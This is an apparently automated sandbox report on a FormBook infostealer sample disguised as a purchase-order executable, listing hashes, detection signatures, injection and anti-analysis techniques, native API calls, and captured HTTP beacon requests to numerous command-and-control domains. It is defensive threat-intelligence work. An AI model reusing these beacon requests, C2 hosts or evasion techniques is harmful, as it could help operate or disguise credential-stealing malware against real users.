Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name: Purchase Order 40,7045$.exe
Analysis ID: 321097
MD5: 4142c1713da2f4f94bec71bfed46587b
SHA1: 06cc7bd53758a0936f4b674847411a4f912fd654
SHA256: fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
Tags: exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: Purchase Order 40,7045$.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: Purchase Order 40,7045$.exe Virustotal: Detection: 43% Perma Link
Source: Purchase Order 40,7045$.exe ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Purchase Order 40,7045$.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 4x nop then pop edi 1_2_00415044
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 4x nop then pop edi 1_2_00415C88
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 4x nop then pop ebx 1_2_004066DA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 5_2_02B15044
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop ebx 5_2_02B066DA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 5_2_02B15C88

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.58.78.16 52.58.78.16
Source: Joe Sandbox View IP Address: 185.201.11.126 185.201.11.126
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
Source: Joe Sandbox View ASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.handsfreedocs.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 10:07:21 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp String found in binary or memory: http://www.hemparcade.com
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp String found in binary or memory: http://www.hemparcade.com/
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp String found in binary or memory: http://yuyabo.com/

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Executable has a suspicious name (potential lure to open the executable)
Source: Purchase Order 40,7045$.exe Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Purchase Order 40,7045$.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00417BA0 NtCreateFile, 1_2_00417BA0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00417C50 NtReadFile, 1_2_00417C50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00417CD0 NtClose, 1_2_00417CD0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00417D80 NtAllocateVirtualMemory, 1_2_00417D80
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00417C4C NtReadFile, 1_2_00417C4C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00417CCA NtClose, 1_2_00417CCA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC98F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_00FC98F0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_00FC9860
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9840 NtDelayExecution,LdrInitializeThunk, 1_2_00FC9840
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC99A0 NtCreateSection,LdrInitializeThunk, 1_2_00FC99A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_00FC9910
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9A50 NtCreateFile,LdrInitializeThunk, 1_2_00FC9A50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9A20 NtResumeThread,LdrInitializeThunk, 1_2_00FC9A20
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_00FC9A00
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC95D0 NtClose,LdrInitializeThunk, 1_2_00FC95D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9540 NtReadFile,LdrInitializeThunk, 1_2_00FC9540
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC96E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_00FC96E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_00FC9660
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9FE0 NtCreateMutant,LdrInitializeThunk, 1_2_00FC9FE0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC97A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00FC97A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00FC9780
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9710 NtQueryInformationToken,LdrInitializeThunk, 1_2_00FC9710
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC98A0 NtWriteVirtualMemory, 1_2_00FC98A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FCB040 NtSuspendThread, 1_2_00FCB040
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9820 NtEnumerateKey, 1_2_00FC9820
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC99D0 NtCreateProcessEx, 1_2_00FC99D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9950 NtQueueApcThread, 1_2_00FC9950
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9A80 NtOpenDirectoryObject, 1_2_00FC9A80
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9A10 NtQuerySection, 1_2_00FC9A10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FCA3B0 NtGetContextThread, 1_2_00FCA3B0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9B00 NtSetValueKey, 1_2_00FC9B00
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC95F0 NtQueryInformationFile, 1_2_00FC95F0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9560 NtWriteFile, 1_2_00FC9560
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FCAD30 NtSetContextThread, 1_2_00FCAD30
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9520 NtWaitForSingleObject, 1_2_00FC9520
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC96D0 NtCreateKey, 1_2_00FC96D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9670 NtQueryInformationProcess, 1_2_00FC9670
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9650 NtQueryValueKey, 1_2_00FC9650
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9610 NtEnumerateValueKey, 1_2_00FC9610
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9770 NtSetInformationFile, 1_2_00FC9770
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FCA770 NtOpenThread, 1_2_00FCA770
